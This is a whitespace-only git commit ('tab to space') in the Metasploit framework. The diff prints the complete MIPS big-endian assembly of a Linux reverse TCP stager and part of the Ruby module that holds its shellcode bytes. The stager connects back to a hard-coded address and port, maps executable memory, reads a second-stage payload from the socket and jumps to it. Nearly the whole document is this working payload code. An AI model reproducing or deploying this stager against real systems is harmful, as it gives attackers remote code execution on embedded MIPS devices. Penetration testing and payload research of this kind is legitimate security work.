tab to space

bug/bundler_fix
tkmru 2017-07-05 18:22:06 +09:00
parent 615eb53796
commit 2d8a71de6f
2 changed files with 99 additions and 99 deletions


@ -27,117 +27,117 @@
# generate the string to place on: # generate the string to place on:
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb # modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
## ##
.text .text
.align 2 .align 2
.globl main .globl main
.set nomips16 .set nomips16
main: main:
.set noreorder .set noreorder
.set nomacro .set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2) # a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2) # a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0) # a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183) # v0: syscall = __NR_socket (4183)
li $t7, -6 li $t7, -6
nor $t7, $t7, $zero nor $t7, $t7, $zero
addi $a0, $t7, -3 addi $a0, $t7, -3
addi $a1, $t7, -3 addi $a1, $t7, -3
slti $a2, $zero, -1 slti $a2, $zero, -1
li $v0, 4183 li $v0, 4183
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
sw $v0, -4($sp) # store the file descriptor for the socket on the stack sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd # a0: sockfd
# a1: addr = AF_INET (2) # a1: addr = AF_INET (2)
# a2: addrlen = 16 # a2: addrlen = 16
# v0: syscall = __NR_connect (4170) # v0: syscall = __NR_connect (4170)
lw $a0, -4($sp) lw $a0, -4($sp)
li $t7, -3 li $t7, -3
nor $t7, $t7, $zero nor $t7, $t7, $zero
sw $t7, -32($sp) sw $t7, -32($sp)
lui $t6, 0x115c lui $t6, 0x115c
sw $t6, -28($sp) sw $t6, -28($sp)
lui $t6, 0x7f00 # ip lui $t6, 0x7f00 # ip
ori $t6, $t6, 0x0001 # ip ori $t6, $t6, 0x0001 # ip
sw $t6, -26($sp) sw $t6, -26($sp)
addiu $a1, $sp, -30 addiu $a1, $sp, -30
li $t4, -17 li $t4, -17
nor $a2, $t4, $zero nor $a2, $t4, $zero
li $v0, 4170 li $v0, 4170
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1 # a0: addr = -1
# a1: lenght = 4096 # a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7) # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1 # sp(16): fd = -1
# sp(20): offset = 0 # sp(20): offset = 0
# v0: syscall = __NR_mmap (4090) # v0: syscall = __NR_mmap (4090)
li $a0, -1 li $a0, -1
li $a1, 4097 li $a1, 4097
addi $a1, $a1, -1 addi $a1, $a1, -1
li $t1, -8 li $t1, -8
nor $t1, $t1, $0 nor $t1, $t1, $0
add $a2, $t1, $0 add $a2, $t1, $0
li $a3, 2050 li $a3, 2050
li $t3, -22 li $t3, -22
nor $t3, $t3, $zero nor $t3, $t3, $zero
add $t3, $sp, $t3 add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090 li $v0, 4090
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
sw $v0, -8($sp) # Stores the mmap'ed address on the stack sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096) # read(sockfd, addr, 4096)
# a0: sockfd # a0: sockfd
# a1: addr # a1: addr
# a2: len = 4096 # a2: len = 4096
# v0: syscall = __NR_read (4003) # v0: syscall = __NR_read (4003)
lw $a0, -4($sp) lw $a0, -4($sp)
lw $a1, -8($sp) lw $a1, -8($sp)
li $a2, 4097 li $a2, 4097
addi $a2, $a2, -1 addi $a2, $a2, -1
li $v0, 4003 li $v0, 4003
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
# cacheflush(addr, nbytes, DCACHE) # cacheflush(addr, nbytes, DCACHE)
# a0: addr # a0: addr
# a1: nbytes # a1: nbytes
# a2: cache = DCACHE (2) # a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147) # v0: syscall = __NR_read (4147)
lw $a0, -8($sp) lw $a0, -8($sp)
add $a1, $v0, $zero add $a1, $v0, $zero
li $t1, -3 li $t1, -3
nor $t1, $t1, $0 nor $t1, $t1, $0
add $a2, $t1, $0 add $a2, $t1, $0
li $v0, 4147 li $v0, 4147
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
# jmp to the stage # jmp to the stage
lw $s1, -8($sp) lw $s1, -8($sp)
lw $s2, -4($sp) lw $s2, -4($sp)
jalr $s1 jalr $s1
failed: failed:
# exit(status) # exit(status)
# a0: status # a0: status
# v0: syscall = __NR_exit (4001) # v0: syscall = __NR_exit (4001)
li $a0, 1 li $a0, 1
li $v0, 4001 li $v0, 4001
syscall 0x40404 syscall 0x40404
.set macro .set macro
.set reorder .set reorder


@ -104,11 +104,11 @@ module MetasploitModule
"\x8f\xb2\xff\xfc" + # lw s2,-4(sp) "\x8f\xb2\xff\xfc" + # lw s2,-4(sp)
"\x02\x20\xf8\x09" + # jalr s1 "\x02\x20\xf8\x09" + # jalr s1
# 4006bc <failed>: # 4006bc <failed>:
"\x24\x04\x00\x01" + # li a0,1 "\x24\x04\x00\x01" + # li a0,1
"\x24\x02\x0f\xa1" + # li v0,4001 "\x24\x02\x0f\xa1" + # li v0,4001
# exit(status) # exit(status)
"\x01\x01\x01\x0c" + # syscall 0x40404 "\x01\x01\x01\x0c" + # syscall 0x40404
"\x00\x20\x08\x25" + # move at,at "\x00\x20\x08\x25" + # move at,at
"\x00\x20\x08\x25" # move at,at "\x00\x20\x08\x25" # move at,at
} }
)) ))